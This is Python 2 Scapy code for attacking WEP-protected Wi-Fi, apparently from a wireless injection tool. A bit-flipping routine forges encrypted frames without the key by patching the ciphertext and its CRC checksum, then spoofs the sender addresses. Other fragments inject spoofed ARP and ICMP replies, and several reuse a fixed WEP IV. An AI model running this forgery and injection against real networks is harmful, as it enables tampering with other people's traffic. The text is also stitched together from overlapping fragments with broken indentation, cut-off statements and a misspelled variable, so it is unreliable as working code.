    def flip_bits(self, packet):
        """Return a copy of *packet* with two bytes of its WEP ciphertext
        XOR-patched and the encrypted ICV adjusted so the frame still verifies.

        No key is involved anywhere below: WEP's ICV is an unkeyed CRC-32,
        which is linear under XOR, so the CRC of the patch mask can be XORed
        straight onto the encrypted ICV.  That missing keyed integrity check
        is the weakness WPA2/WPA3 (CCMP/GCMP with a real MIC) close; for a
        network still on WEP the mitigation is migration, not configuration.

        Args:
            packet: Scapy frame containing Dot11 and Dot11WEP layers.

        Returns:
            A new frame; *packet* itself is left untouched (``packet.copy()``).

        NOTE(review): written for Python 2 -- ``str(packet[Dot11WEP])`` and
        the chr/ord arithmetic below rely on str-as-bytes.  Under Python 3
        this would need a bytes-based rewrite.
        """
        wepdata = packet[Dot11WEP].wepdata
        # Skip first 4 bytes corresponding to IV and KeyID
        # The ICV is included in the cyphertext and corresponds to the last 4 bytes
        cyphertext = str(packet[Dot11WEP])[4:]

        flipped_packet = packet.copy()  # Preserve the original wep packet
        # Create bitmask with same size as the encrypted wepdata, excluding the ICV
        bitmask = list('\x00' * len(wepdata))
        # Flip bits of the bitmask corresponding to the last byte of sender MAC and IP respectively
        # (the fixed offsets presume an ARP body behind LLC/SNAP -- confirm against the caller)
        bitmask[len(wepdata) - 15] = chr(randint(0, 255))
        bitmask[len(wepdata) - 11] = chr(randint(0, 255))

        # Create crc32 checksum for the bitmask (calc_crc32 is a project helper, not shown here)
        icv_patch = calc_crc32(bitmask)
        icv_patch_bytes = pack("<I", icv_patch)
        final_bitmask = bitmask + list(icv_patch_bytes)  # Append the ICV patch to the bitmask data

        # Now apply the 'patch' to the wepdata and the icv by XORing the final_bitmask with the original cyphertext
        # (final_bitmask and cyphertext are the same length: len(wepdata) + 4 ICV bytes)
        flipped_result = [ chr( ord(cyphertext[i]) ^ ord(final_bitmask[i]) ) for i in range(len(cyphertext)) ]
        final_result = str(packet[Dot11WEP])[:4] + "".join(flipped_result)

        # Put the results back in the packet
        flipped_packet[Dot11WEP] = Dot11WEP(final_result)
        # Now lets change the 802.11 information header to make it look like it came from a client.
        flipped_packet[Dot11].FCfield = "from-DS+retry+wep"
        flipped_packet[Dot11].addr1 = "ff:ff:ff:ff:ff:ff"
        # Keep the original addr2 prefix but randomise its last byte; addr2 is then set to the stored AP BSSID
        flipped_packet[Dot11].addr3 = (packet[Dot11].addr2[:-2] + "%02x") % randint(0, 255)
        flipped_packet[Dot11].addr2 = self.ap_bssid

        return flipped_packet
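    def handle_read(self):
        """Forward one frame read from the tap device onto the wireless side
        as a from-DS 802.11 data frame.

        Buffer layout as read from the tap (per the original author's diagram):

            | 4 bytes | 4 bytes |   18 bytes   |     1500 bytes    |
                Tap       VLAN    Ether Header          Frame

        Only the leading 4 bytes are stripped before the rest is parsed as
        Ether.  Uses ``self.read`` and ``self.radiotap`` from the enclosing
        class and reads ``self._tap.bssid``, ``self._tap.smac``,
        ``self._tap.has_wep`` and ``self._tap.key_id``.

        Returns:
            None; the built frame is handed to ``sendp``.
        """
        import os  # function-scope: only needed for the per-frame IV below

        buf = self.read(1526)
        eth_rcvd_frame = Ether(buf[4:])
        ether = eth_rcvd_frame.getlayer(Ether)

        # Prepare Dot11 frame for injection
        dot11_sent_frame = self.radiotap()
        dot11_sent_frame /= Dot11(type="Data",
                                  FCfield="from-DS",
                                  addr1=ether.dst,
                                  addr2=self._tap.bssid)

        # It doesn't seem possible to set tuntap interface MAC address
        # when we create it, so we set source MAC here
        if self._tap.smac == '':
            dot11_sent_frame.addr3 = ether.src
        else:
            dot11_sent_frame.addr3 = self._tap.smac

        if self._tap.has_wep:
            dot11_sent_frame.FCfield |= 0x40  # Protected (WEP) bit
            # Fresh 3-byte IV per frame.  The previous constant IV ("111")
            # reused the same RC4 keystream for every frame sent, so any two
            # frames XORed together leaked the XOR of their plaintexts.
            dot11_sent_frame /= Dot11WEP(iv=os.urandom(3), keyid=self._tap.key_id)

        dot11_sent_frame /= LLC(ctrl=3) / SNAP(code=ether.type) / ether.payload

        # Frame injection :
        sendp(dot11_sent_frame, verbose=0)  # Send from-DS frame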
                             "Received ARP Request on %s\n" % options.in_iface)

                    if optios.verb:
                        os.write(1, "%s\n" % dot11_frame.summary())

                # Building ARP Reply answer for injection
                dot11_answer = RadioTap() / Dot11(
                    type="Data",
                    FCfield="from-DS",
                    addr1=dot11_frame.getlayer(Dot11).addr2,
                    addr2=options.bssid)
                dot11_answer.addr3 = options.smac

                if options.wepkey is not None:
                    dot11_answer.FCfield |= 0x40
                    dot11_answer /= Dot11WEP(iv="111", keyid=options.keyid)

                dot11_answer /= LLC(ctrl=3) / SNAP() / ARP(
                    op="is-at",
                    hwsrc=options.smac,
                    psrc=dot11_frame.getlayer(ARP).pdst,
                    hwdst=dot11_frame.getlayer(ARP).hwsrc,
                    pdst=dot11_frame.getlayer(ARP).psrc)

                dot11_answer /= dot11_frame.getlayer(ARP).payload

                if options.debug:
                    os.write(1, "Sending ARP Reply on %s\n" % optios.out_iface)
                    if options.verb:
                        os.write(1, "%s\n" % dot11_answer.summary())
# Prepare Dot11 frame for injection
            dot11_sent_frame = RadioTap() / Dot11(
                type="Data",
                FCfield="from-DS",
                addr1=eth_rcvd_frame.getlayer(Ether).dst,
                addr2=BSSID)
            # It doesn't seem possible to set tuntap interface MAC address
            # when we create it, so we set source MAC here
            if not HAS_SMAC:
                dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
            else:
                dot11_sent_frame.addr3 = SMAC
            if WEP:
                dot11_sent_frame.FCfield |= 0x40
                dot11_sent_frame /= Dot11WEP(iv="111", keyid=KEYID)
            dot11_sent_frame /= LLC(ctrl=3) / SNAP(
                code=eth_rcvd_frame.getlayer(
                    Ether).type) / eth_rcvd_frame.getlayer(Ether).payload

            if DEBUG:
                os.write(1, "Sending from-DS to %s\n" % OUT_IFACE)
                if VERB:
                    os.write(1, "%s\n" % dot11_sent_frame.summary())

# Frame injection :
            sendp(dot11_sent_frame, verbose=0)  # Send from-DS frame

# Frame from WiFi network
        if s in r:
                # Prepare Dot11 frame for injection
                dot11_sent_frame = RadioTap() / Dot11(
                    type="Data",
                    FCfield="from-DS",
                    addr1=eth_rcvd_frame.getlayer(Ether).dst,
                    addr2=options.bssid)
                # It doesn't seem possible to set tuntap interface MAC address
                # when we create it, so we set source MAC here
                if options.smac is None:
                    dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
                else:
                    dot11_sent_frame.addr3 = options.smac
                if options.wepkey is not None:
                    dot11_sent_frame.FCfield |= 0x40
                    dot11_sent_frame /= Dot11WEP(iv="111", keyid=options.keyid)

                dot11_sent_frame /= LLC(ctrl=3) / SNAP(
                    code=eth_rcvd_frame.getlayer(
                        Ether).type) / eth_rcvd_frame.getlayer(Ether).payload

                if options.debug:
                    os.write(1, "Sending from-DS to %s\n" % options.out_iface)
                    if options.verb:
                        os.write(1, "%s\n" % dot11_sent_frame.summary())

                # Frame injection :
                sendp(dot11_sent_frame, verbose=0)  # Send from-DS frame

            # Frame from WiFi network
            if s in r:
                if VERB:
                    os.write(1, "%s\n" % dot11_frame.summary())

        # Building ICMP Echo Reply answer for injection
            dot11_answer = RadioTap() / Dot11(
                type="Data",
                FCfield="from-DS",
                addr1=dot11_frame.getlayer(Dot11).addr2,
                addr2=BSSID)
            if not HAS_SMAC:
                dot11_answer.addr3 = dot11_frame.getlayer(Dot11).addr1
            else:
                dot11_answer.addr3 = SMAC
            if WEP:
                dot11_answer.FCfield |= 0x40
                dot11_answer /= Dot11WEP(iv="111", keyid=KEYID)
            dot11_answer /= LLC(ctrl=3) / SNAP() / IP(
                src=dot11_frame.getlayer(IP).dst,
                dst=dot11_frame.getlayer(IP).src,
                ttl=TTL)
            dot11_answer /= ICMP(type="echo-reply",
                                 id=dot11_frame.getlayer(ICMP).id,
                                 seq=dot11_frame.getlayer(ICMP).seq)
            dot11_answer /= dot11_frame.getlayer(ICMP).payload

            if DEBUG:
                os.write(1, "Sending ICMP Echo Reply on %s\n" % OUT_IFACE)
                if VERB:
                    os.write(1, "%s\n" % dot11_answer.summary())

        # Frame injection :